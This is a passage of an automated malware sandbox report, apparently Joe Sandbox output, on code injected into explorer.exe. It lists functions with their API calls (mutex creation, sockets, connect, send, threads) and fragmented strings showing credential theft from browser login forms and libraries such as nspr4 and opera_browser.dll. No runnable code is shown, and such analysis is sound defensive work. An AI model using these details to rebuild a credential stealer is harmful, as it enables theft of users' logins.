                                                                                                                                                                                                                      control_flow_graph 232 fe8bb66-fe8bb68 233 fe8bb6a-fe8bb6b 232->233 234 fe8bb93-fe8bbb8 232->234 235 fe8bb6d-fe8bb71 233->235 236 fe8bbbe-fe8bc22 call fe92612 call fe94942 * 2 233->236 237 fe8bbbb-fe8bbbc 234->237 235->237 238 fe8bb73-fe8bb92 235->238 246 fe8bc28-fe8bc2b 236->246 247 fe8bcdc 236->247 237->236 238->234 246->247 248 fe8bc31-fe8bcb0 call fe96da4 call fe96022 call fe963e2 call fe96022 call fe963e2 246->248 249 fe8bcde-fe8bcf6 247->249 261 fe8bcb5-fe8bcca CreateMutexExW 248->261 262 fe8bcce-fe8bcd3 261->262 262->247 263 fe8bcd5-fe8bcda 262->263 263->249
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateMutex
                                                                                                                                                                                                                      • String ID: .dll$el32$kern
                                                                                                                                                                                                                      • API String ID: 1964310414-1222553051
                                                                                                                                                                                                                      • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                                      • Instruction ID: c54581a2d9bfa52be551faee12858ba4f97fc60cb480dbd43f6b69d40d709afc
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8416A70928A088FDF54FFA8C4947AD77E0FBA8300F44517AC84EDB256DE349946CB95
                                                                                                                                                                                                                      Function 0FE8BB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateMutex
                                                                                                                                                                                                                      • String ID: .dll$el32$kern
                                                                                                                                                                                                                      • API String ID: 1964310414-1222553051
                                                                                                                                                                                                                      • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                                      • Instruction ID: c168c6570f9710842c880358101a30b35e65bd12a75d9fb2209ba0a01b659950
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7414970918A088FDF94EFA8C4987ED77E0FBA8300F44516AC84EDB256DE349946CB95
                                                                                                                                                                                                                      Function 0FE9172E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 293 fe9172e-fe91768 294 fe91788-fe917ab connect 293->294 295 fe9176a-fe91782 call fe94942 293->295 295->294
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: connect
                                                                                                                                                                                                                      • String ID: conn$ect
                                                                                                                                                                                                                      • API String ID: 1959786783-716201944
                                                                                                                                                                                                                      • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                                                      • Instruction ID: 142de0ff6f6621231ac2c1ed1768efa049f741543c21806d72bc81a0019d2400
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44011A70618B1C8FCB94EF5CE088B55B7E0FB59324F1545AEE90DCB266CA74D9818BC2
                                                                                                                                                                                                                      Function 0FE91732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 298 fe91732-fe91768 299 fe91788-fe917ab connect 298->299 300 fe9176a-fe91782 call fe94942 298->300 300->299
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: connect
                                                                                                                                                                                                                      • String ID: conn$ect
                                                                                                                                                                                                                      • API String ID: 1959786783-716201944
                                                                                                                                                                                                                      • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                                                      • Instruction ID: c2ececf72d8218aa637e6292bf5ef583355689e927f0fabfe4b4dd0268d98baf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1541AEA90DCB266CA74C9818BC2
                                                                                                                                                                                                                      Function 0FE916B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 411 fe916b2-fe916e5 412 fe91705-fe9172d send 411->412 413 fe916e7-fe916ff call fe94942 411->413 413->412
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: send
                                                                                                                                                                                                                      • String ID: send
                                                                                                                                                                                                                      • API String ID: 2809346765-2809346765
                                                                                                                                                                                                                      • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                                                      • Instruction ID: a17d207120f2cc0dacff50125d6e1fd36b376b71a69f8e1b830c2e2db0915aeb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B501127051CA1D8FDB84EF1CD048B2577E0EB58315F1545AED85DCB266C674D8818B81
                                                                                                                                                                                                                      Function 0FE915B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 416 fe915b2-fe915ea 417 fe9160a-fe9162b socket 416->417 418 fe915ec-fe91604 call fe94942 416->418 418->417
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: socket
                                                                                                                                                                                                                      • String ID: sock
                                                                                                                                                                                                                      • API String ID: 98920635-2415254727
                                                                                                                                                                                                                      • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                                                      • Instruction ID: f1841b3b151b189125abedfd4f8968d80721ce1c351a10b6f1eee0e41cb1f3d7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE012C70618A1C8FCB84EF1CE048B54BBE0FB59354F1545AEE85ECB266C7B4C9818B86
                                                                                                                                                                                                                      Function 0FE892DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 421 fe892dd-fe89320 call fe94942 424 fe893fa-fe8940e 421->424 425 fe89326 421->425 426 fe89328-fe89339 SleepEx 425->426 426->426 427 fe8933b-fe89341 426->427 428 fe8934b-fe89352 427->428 429 fe89343-fe89349 427->429 431 fe89370-fe89376 428->431 432 fe89354-fe8935a 428->432 429->428 430 fe8935c-fe8936a call fe93f12 429->430 430->431 434 fe89378-fe8937e 431->434 435 fe893b7-fe893bd 431->435 432->430 432->431 434->435 437 fe89380-fe8938a 434->437 438 fe893bf-fe893cf call fe89e72 435->438 439 fe893d4-fe893db 435->439 437->435 440 fe8938c-fe893b1 call fe8a432 437->440 438->439 439->426 442 fe893e1-fe893f5 call fe890f2 439->442 440->435 442->426
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                      • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                                                      • Instruction ID: 36909975c0467232aea4345601e236e0ce8cda52fed9992ce35c7d903af7e498
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41316870A04B09DEDB64FF6980882E9B7A1FB54305F84527EC92ECB247CB34A052CF91
                                                                                                                                                                                                                      Function 0FE89412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 457 fe89412-fe89446 call fe94942 460 fe89448-fe89472 call fe96c9e CreateThread 457->460 461 fe89473-fe8947d 457->461
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608445473.000000000FE00000.00000040.80000000.00040000.00000000.sdmp, Offset: 0FE00000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_fe00000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                                                                      • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                                                      • Instruction ID: c21717f43407f2cfa32d78c2f0a22d702a8433ae1016e9b5dcee2b775a2a04f3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF0C230668B4D4FDB88EB2CD48563AB3D0EBA8214F44463EA54DC3265DA29D5828716

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 10472D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                                                      • API String ID: 0-393284711
                                                                                                                                                                                                                      • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                                                      • Instruction ID: fb4d45cd4c69405e5ba957445811f25608358d98a5675f53e1998378588b9a45
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E16BB4628B488FC764DF68C4857EBB7E0FB58305F408A2EA59BC7241DF34A501CB89
                                                                                                                                                                                                                      Function 10475792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                                                      • API String ID: 0-2916316912
                                                                                                                                                                                                                      • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                                      • Instruction ID: b20ddfb4c7004786d539daeb4ffc26bb7730086ae10122cfde952ee16b92d70f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BB18D30528B488EDB55EF68C486AEEB7F1FF58304F50891EE49AC7251EF74A405CB86
                                                                                                                                                                                                                      Function 10473622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                                                      • API String ID: 0-1539916866
                                                                                                                                                                                                                      • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                                      • Instruction ID: 230b61706135ef40a31adfce6d1411a3a87423d8239c628af404318328931ce3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E941D6B0A18B0C8FDB18DF88A4866BD7BE6FB48705F00825ED409D3341DB749D458BD6
                                                                                                                                                                                                                      Function 1047AAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                                                      • API String ID: 0-355182820
                                                                                                                                                                                                                      • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                                      • Instruction ID: 9d272c60a0b3cae882ea2a03e9591e78cf8d6bd92037d029e1e96fc5dd9bb9f0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7C14A75218A098BC758EF64C4C66DAF3E1FB94304F40862EA59AC7210DF74B515CBC6
                                                                                                                                                                                                                      Function 1047AF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                                                      • API String ID: 0-97273177
                                                                                                                                                                                                                      • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                                      • Instruction ID: 6babf27704d84678344d444d947db27256b84fdd2fb15a00c05182ca9259777d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4451B1315187488FD719DF18C8C16EAB7E5FB85704F505A2EE9CBC7241DBB8A906CB82
                                                                                                                                                                                                                      Function 104742F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                                      • API String ID: 0-639201278
                                                                                                                                                                                                                      • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                                      • Instruction ID: 888942359697fbe910ea966bd3a3c431b3bd2c866eccddb52b85c29f5c329e6e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86C1B175628A198FC748EF68D496AEAB3E1FB94304F41832DA54EC7251DF38EA01C7C5
                                                                                                                                                                                                                      Function 104742F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                                                      • API String ID: 0-639201278
                                                                                                                                                                                                                      • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                                      • Instruction ID: 91912a83d573f3e82ada93e8e5c189607c3bcc17d288211b6114ef1ac55f343e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FC1A175628A198FC748EF68D496AEAB3E1FB94304F41832DA54EC7251DF38EA01C7C5
                                                                                                                                                                                                                      Function 10475CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                                      • API String ID: 0-2058692283
                                                                                                                                                                                                                      • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                                      • Instruction ID: 1bff6be570f1db66cc5ca0788616f696137708cf50dd61fbcc7597c1f7a96750
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35A1C0706287888FDB18EFA89485BEEB7F1FF88304F40862DE48AD7241EF7495458785
                                                                                                                                                                                                                      Function 10475CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                                                                      • API String ID: 0-2058692283
                                                                                                                                                                                                                      • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                                      • Instruction ID: f7c639ec367eca5db30ca715b7d7248ca509ccf1987d00abe011c94eb42d10ed
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB919E706187488FDB18EFA89485BEEB7F1FF88304F40862EE48AD7251EB7495458785
                                                                                                                                                                                                                      Function 10475352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: $.$e$n$v
                                                                                                                                                                                                                      • API String ID: 0-1849617553
                                                                                                                                                                                                                      • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                                      • Instruction ID: 06fc2b88afda5484ff0131255a31159557a53c7b29768bf6b28ae43b9edd35b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 967191316187488FD758EF68C4C57EAB7F1FF58308F00462EE44AC7221EB75A9458B85
                                                                                                                                                                                                                      Function 10470C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                                      • API String ID: 0-1970020201
                                                                                                                                                                                                                      • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                                      • Instruction ID: 5f88907158df7a399256051d74fa72a232ea0645dff6ce215a9e694640433202
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02514DB4914B4C8BDB64DF64C0857EEB7F1FF58304F40462EA59AE7214EF34A5418B89
                                                                                                                                                                                                                      Function 1047186F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.4608643398.0000000010400000.00000040.00000001.00040000.00000000.sdmp, Offset: 10400000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_10400000_explorer.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                                                      • API String ID: 0-1610437797
                                                                                                                                                                                                                      • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                                      • Instruction ID: f07fbdbee8905c0223002d8c233252a06a292cd6ec99fc3eb647ae5232f64dc0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00417234219B4C8BCBA5EF2898857EA73E5FB98305F41862E995EC7250EF34D50587C2
                                                                                                                                                                                                                      Function 104734B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
